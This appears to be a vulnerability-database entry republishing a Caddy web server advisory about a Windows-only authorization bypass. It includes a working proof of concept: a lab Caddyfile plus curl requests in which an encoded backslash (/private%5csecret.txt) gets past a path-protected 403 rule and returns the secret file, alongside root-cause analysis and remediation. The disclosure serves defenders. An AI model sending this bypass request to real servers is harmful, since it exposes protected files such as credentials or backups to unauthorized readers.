Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Unauthenticated remote HTTP request bypasses path-based authorization on Windows with no user interaction; impact is confidential file disclosure only, no integrity or availability effect.
Primary rating from Vendor (https://github.com/caddyserver/caddy).
CVSS VectorVendor: https://github.com/caddyserver/caddy
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Lifecycle Timeline
3DescriptionCVE.org
Summary
On Windows, Caddy path matchers treat /private\secret.txt as outside /private/*, but file_server later resolves the same request path as private\secret.txt on disk.
An unauthenticated remote client can request /private%5csecret.txt and bypass Caddy path-scoped auth/deny routes protecting /private/*.
Details
The mismatch is between two Caddy code paths:
MatchPath.MatchWithError()comparesr.URL.Pathusing URL path semantics and does not normalize\to/:modules/caddyhttp/matchers.go:429,:436,:490,:532.- If the route matcher misses, Caddy skips that route:
modules/caddyhttp/routes.go:271. file_serverthen maps the same request path to a filesystem path withSanitizedPathJoin(root, r.URL.Path):modules/caddyhttp/fileserver/staticfiles.go:294,modules/caddyhttp/caddyhttp.go:257,:263.- On Windows, Go filesystem path handling treats
\as a separator, so the default filesystem opens the file under the protected directory:internal/filesystems/os.go:18.
This is related to, but distinct from, GHSA-4xrr-hq4w-6vf4 / CVE-2026-27585. That advisory fixed backslash handling in the file matcher / try_files glob path. This report does not use try_files or the file matcher; it affects ordinary path route matchers in front of direct file_server serving and reproduces on current HEAD.
PoC
Tested on current HEAD 6c675e29f87cbe7326983ddb6d739175119d394c with a Windows caddy.exe built from this repository.
On Windows, create the test files and Caddyfile:
$base = "C:\Users\Public\caddy-backslash-poc"
Remove-Item -Recurse -Force $base -ErrorAction SilentlyContinue
New-Item -ItemType Directory -Force "$base\www\private" | Out-Null
Set-Content -Path "$base\www\private\secret.txt" -Value "SECRET_FROM_WINDOWS_LAB" -NoNewline -Encoding ASCII
@'
{
debug
admin off
auto_https off
}
:19080 {
log
root * C:\Users\Public\caddy-backslash-poc\www
@private path /private/*
respond @private 403
file_server
}
'@ | Set-Content -Path "$base\Caddyfile" -Encoding ASCIIStart Caddy:
cd C:\Users\Public\caddy-backslash-poc
.\caddy.exe run --config Caddyfile --adapter caddyfileBaseline request, expected to be blocked:
curl -v --path-as-is http://<windows-host>:19080/private/secret.txtObserved:
> GET /private/secret.txt HTTP/1.1
< HTTP/1.1 403 ForbiddenBypass request:
curl -v --path-as-is 'http://<windows-host>:19080/private%5csecret.txt'Observed:
> GET /private%5csecret.txt HTTP/1.1
< HTTP/1.1 200 OK
< Content-Length: 23
SECRET_FROM_WINDOWS_LABUppercase %5C produces the same result.
Relevant debug log lines:
{"msg":"using config from file","file":"C:\\Users\\Public\\caddy-backslash-poc\\Caddyfile"}
{"logger":"http.log","msg":"server running","name":"srv0","protocols":["h1","h2","h3"]}
{"logger":"http.log.access","request":{"method":"GET","uri":"/private/secret.txt"},"status":403}
{"logger":"http.log.access","request":{"method":"GET","uri":"/private%5csecret.txt"},"status":200}Impact
This is a Windows-only remote authorization bypass for deployments that protect static subtrees with Caddy path matchers before file_server.
This pattern is documented by Caddy itself, for example basic_auth /secret/* { ... } followed by file_server.
An attacker can read files that were intended to be protected by Caddy-side basic_auth, respond 403, or other path-scoped handlers. The issue does not escape the configured site root; ..%5c traversal is still blocked. The practical impact is sensitive file disclosure inside the protected subtree, with higher impact if that subtree contains backups, database files, exported admin data, credentials, or signing/session secrets.
Suggested Fix
Normalize Windows path separators consistently before MatchPath evaluates request paths, or reject request paths containing \ before file_server resolves them as filesystem separators.
The important invariant is that a request path used for route authorization must not later resolve to a different protected filesystem path.
AI Disclosure
LLM assistance was used for codebase analysis and report drafting. The PoC was manually validated, including an end-to-end reproduction on a Windows Server lab host using a Windows caddy.exe built from current HEAD.
AnalysisAI
Authorization bypass in Caddy web server on Windows allows unauthenticated remote attackers to access files in path-protected directories by substituting forward slashes with URL-encoded backslashes (%5C). The flaw stems from an inconsistency between Caddy's path matcher and file_server handler, where the matcher treats \ as a literal character while Windows-native filesystem code treats it as a separator. A detailed proof-of-concept is published in the vendor advisory, though no public exploit identified at time of analysis in exploitation databases.
Technical ContextAI
Caddy is a popular Go-based open-source web server widely deployed for static file serving and reverse proxying. The root cause is a CWE-22 path traversal class issue arising from dual-path-interpretation: MatchPath.MatchWithError() in modules/caddyhttp/matchers.go compares r.URL.Path strictly against URL semantics and does not normalize \ to /, so /private\secret.txt does not match the /private/* rule. When the matcher misses, the protective route (e.g., a 403 response or basic_auth) is skipped. The file_server handler then calls SanitizedPathJoin(root, r.URL.Path) and the underlying Go os filesystem layer on Windows treats \ as a path separator, opening the protected file. The CPE data confirms the affected modules are pkg:go/github.com_caddyserver_caddy_v2 and the legacy pkg:go/github.com_caddyserver_caddy. The issue is related to but distinct from CVE-2026-27585 (GHSA-4xrr-hq4w-6vf4), which fixed backslash handling specifically in try_files/file matchers but did not address the broader path matcher path.
RemediationAI
Vendor-released patch: upgrade Caddy v2 to 2.11.4 or later, which normalizes Windows path separators consistently before path-matcher evaluation (https://github.com/caddyserver/caddy/security/advisories/GHSA-qrp7-cvwr-j2c6). For Caddy v1 (<= 1.0.5) no vendor-released patch is identified - migrate to Caddy v2 2.11.4+. If immediate upgrade is not possible on Windows, compensating controls include moving Caddy off Windows to a Linux host (eliminates the OS-specific behavior but requires re-platforming), or placing the authorization decision behind a reverse-proxied upstream that performs its own canonical path enforcement rather than relying on the path matcher in front of file_server (adds latency and operational complexity). A narrower stopgap is to add a not path *\* *%5c* *%5C* exclusion to relevant route matchers so requests containing literal or encoded backslashes are rejected before file_server resolves them; this may break any legitimate URLs containing those characters but is otherwise low-impact.
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38557
GHSA-qrp7-cvwr-j2c6